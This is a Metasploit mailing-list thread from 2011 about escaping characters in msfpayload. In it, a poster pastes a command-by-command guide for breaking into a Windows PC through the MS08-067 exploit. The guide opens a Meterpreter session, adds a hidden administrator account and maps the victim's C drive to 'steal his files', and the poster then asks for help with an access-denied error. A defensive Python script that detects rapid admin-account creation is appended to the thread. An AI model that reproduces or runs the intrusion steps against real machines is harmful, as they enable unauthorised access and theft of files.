Metasploit mailing list archives
Re: Escape characters
From: ravindra kalal <itravin () gmail com>
Date: Fri, 1 Apr 2011 17:14:08 +0530
Hi friends,

I have just started using metasploit, I have successfully hacked a pc with the help from (N0F@T3, MinSteRexS), pls find the below instructions which I have followed:

--------------------------------------------------

- We download nmap (nmap.org) so that we can scan the remote pc.
- On the terminal we write: nmap -sS -O <target ip>
- If you see that ports 139 TCP and 445 TCP are open then everything is exactly as we want it to be.
- Now we download Metasploit (metasploit.org) and we open it via the Terminal.
- Now that Metasploit is running we start the attack.
- We write at the terminal “show exploits” and we get a list of the available exploits.
- We choose the exploit “ms08_067_netapi” by writing “use windows/smb/ms08_067_netapi”
- Now we set RHOST to our victim's ip: “set RHOST <target ip>”
- And RPORT to 445: “set RPORT 445”
- Now we write “set SMBPIPE SRVSVC” and hit ENTER and then “set TARGET 0” and hit ENTER again.
- OK! Let’s set the Payload: “set PAYLOAD windows/meterpreter/bind_tcp”
- IT’S TIME TO HACK THE COMPUTER!!!! Write “exploit” and hit ENTER.
- If everything is ok you should see the following message: “[*] Meterpreter session 1 opened (xxx.xxx.xxx.xxx:xxxx -> xxx.xxx.xxx.xxx:xxxx)”
- Meterpreter is running. We are inside the target pc!
- Let’s open the target’s CMD: “execute -f cmd.exe -c -H -i”
- If it says “X:\WINDOWS\System32” then the mission is accomplished.
- Now let's create our own admin account.
- Write: “net user n0f4t3 mypass /add”. You should see a confirmation message saying “The command completed successfully.”
- Now let's make the account an admin: “net localgroup administrators n0f4t3 /add”.
- You should see again the confirmation message saying: “The command completed successfully.”
- Then type “exit” to exit CMD.
- OMG!! We made it!!! But how can we steal his files????
- We boot from Windows……….
- We go to “Start>Run”, we type “cmd” and we hit ENTER.
- Then we write “net use X: \\<target ip>\C mypass /user:n0f4t3” and hit ENTER.
- If that doesn’t work type “net use X: \\<target ip>\C: mypass /user:n0f4t3” and hit ENTER
- Now go to “My Computer” and you should see a new Drive called X:. Open it and enjoy the victim’s files.

--------------------------------------------------------------------------------

I was successful in creating a user with local administrators rights in the victim's pc but when I am trying to map the victim's drive I am getting the following error:

C:\Documents and Settings\admin>net use R: \\172.16.20.93\c$ 123@456/user:suki
System error 5 has occurred.
Access is denied.

Pls guide..................

thanks and regards,
ravin k

On Fri, Apr 1, 2011 at 1:07 PM, <danuxx () gmail com> wrote:
Then, you could try to use msfconsole instead and from there set the Payload options, that will take care of it.

Sent via BlackBerry from Danux Network

-----Original Message-----
From: Eric <dkn4a1 () gmail com>
Sender: framework-bounces () spool metasploit com
Date: Fri, 1 Apr 2011 12:52:49
To: Jose Selvi <jselvi () pentester es>
Cc: <framework () spool metasploit com>
Subject: Re: [framework] Escape characters

No. I'm not trying to encode the shellcode. Suppose I want to generate a payload executable with msfpayload for the windows/exec payload with the parameter CMD=cmd /c start calc & start notepad. In this case, obviously I need to escape spaces, \ and & characters, like

msfpayload windows/exec CMD=cmd\ \/c\ start\ calc\ \&\ start\ notepad

Likewise, which characters do I need to escape to make it work perfectly fine?

On Fri, Apr 1, 2011 at 12:36 PM, Jose Selvi <jselvi () pentester es> wrote:

MSFEncode is what encodes the payload without badchars. Badchars depend on which vulnerability you are exploiting. Each vulnerability has its own badchars, so there isn't a single list of universal badchars. Some of them are quite common, like 0x00 (end of string), but I think there isn't any universal list. What vulnerability are you exploiting?

Regards.

On 01/04/11 08:53, Eric wrote:

Hello all,

What special characters should be escaped with msfpayload? I believe < > ; : ' " / ( ) % &

Could I find documentation regarding this somewhere? Thanks in advance.

--
Jose Selvi.
Security Technical Consultant
CISA, CISSP, CNAP, GCIH, GPEN
http://www.pentester.es
SANS Mentor in Madrid (Spain).
September 23 - November 25 SEC560: Network Penetration Testing and Ethical Hacking
http://www.sans.org/mentor/details.php?nid=24133
http://www.pentester.es/2010/12/nuevo-grupo-y-descuento-para-network.html

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
--
Thanks & Regards,
ravindra Kalal
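The steps quoted above leave a characteristic trace on the target: a local account is created, added to the Administrators group seconds later, and then used for a network logon when a drive is mapped. The following is an added detection example written for defenders; it is not code from the thread or from the Metasploit project. It runs over constructed Windows Security log events rendered as simplified dicts (field names are assumptions; the Event IDs 4720, 4732 and 4624 and LogonType 3 are the real Windows values) and flags accounts that are created and elevated within a short window.

```python
"""Detection sketch for the account-creation steps quoted in the thread.

Added example, not part of the mailing-list thread. It flags a local account
that is created (Event ID 4720) and then added to the Administrators group
(Event ID 4732) within a short window, and records the first network logon
(Event ID 4624, LogonType 3) with that account afterwards, which is what a
remote drive mapping such as "net use X: \\\\host\\C$" produces on the target.
The event dicts are a simplified, constructed rendering of Security log
fields; the three Event IDs are the real Windows ones.
"""
from datetime import datetime, timedelta

# Constructed sample events (not real log data). "subject" is the account
# that performed the action, "target" the account acted upon.
SAMPLE_EVENTS = [
    {"time": "2011-04-01T11:40:02", "id": 4624, "subject": "-", "target": "admin", "logon_type": 2},
    {"time": "2011-04-01T11:44:10", "id": 4720, "subject": "SYSTEM", "target": "n0f4t3"},
    {"time": "2011-04-01T11:44:11", "id": 4732, "subject": "SYSTEM", "target": "n0f4t3", "group": "Administrators"},
    {"time": "2011-04-01T11:47:30", "id": 4624, "subject": "-", "target": "n0f4t3", "logon_type": 3},
    # A routine helpdesk account creation, elevated hours later: not flagged.
    {"time": "2011-04-01T12:10:00", "id": 4720, "subject": "helpdesk", "target": "jdoe"},
    {"time": "2011-04-01T14:30:00", "id": 4732, "subject": "helpdesk", "target": "jdoe", "group": "Administrators"},
]


def find_suspicious_admin_creation(events, window=timedelta(minutes=10)):
    """Return one finding per account that was created (4720) and added to
    the local Administrators group (4732) within `window`.

    Each finding is a dict with the account name, the creation and elevation
    timestamps, and the time of the first network logon (4624 / LogonType 3)
    by that account after elevation, or None if no such logon was seen.
    """
    created = {}   # account -> creation time
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4720:
            created[ev["target"]] = t
        elif ev["id"] == 4732 and ev.get("group", "").lower() == "administrators":
            c = created.get(ev["target"])
            if c is not None and t - c <= window:
                findings.append({"account": ev["target"], "created": c,
                                 "elevated": t, "network_logon": None})
        elif ev["id"] == 4624 and ev.get("logon_type") == 3:
            # Attribute the first post-elevation network logon to the finding.
            for f in findings:
                if (f["account"] == ev["target"] and f["network_logon"] is None
                        and t >= f["elevated"]):
                    f["network_logon"] = t
    return findings


def main():
    for f in find_suspicious_admin_creation(SAMPLE_EVENTS):
        gap = (f["elevated"] - f["created"]).total_seconds()
        print(f"account {f['account']} created {f['created']} and made local admin "
              f"{gap:.0f}s later; first network logon: {f['network_logon']}")


if __name__ == "__main__":
    main()
```

The window is deliberately short: legitimate provisioning rarely creates an account and grants it local admin within seconds from a SYSTEM or unusual subject, so tightening the window and checking the "subject" field against expected admin accounts is where a real rule would add precision.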
Current thread:
- Re: Escape characters Jose Selvi (Apr 01)
- Re: Escape characters Eric (Apr 01)
- Re: Escape characters danuxx (Apr 01)
- Re: Escape characters ravindra kalal (Apr 01)
- Re: Escape characters Patrick Webster (Apr 01)
- Re: Escape characters danuxx (Apr 01)
- Re: Escape characters Eric (Apr 01)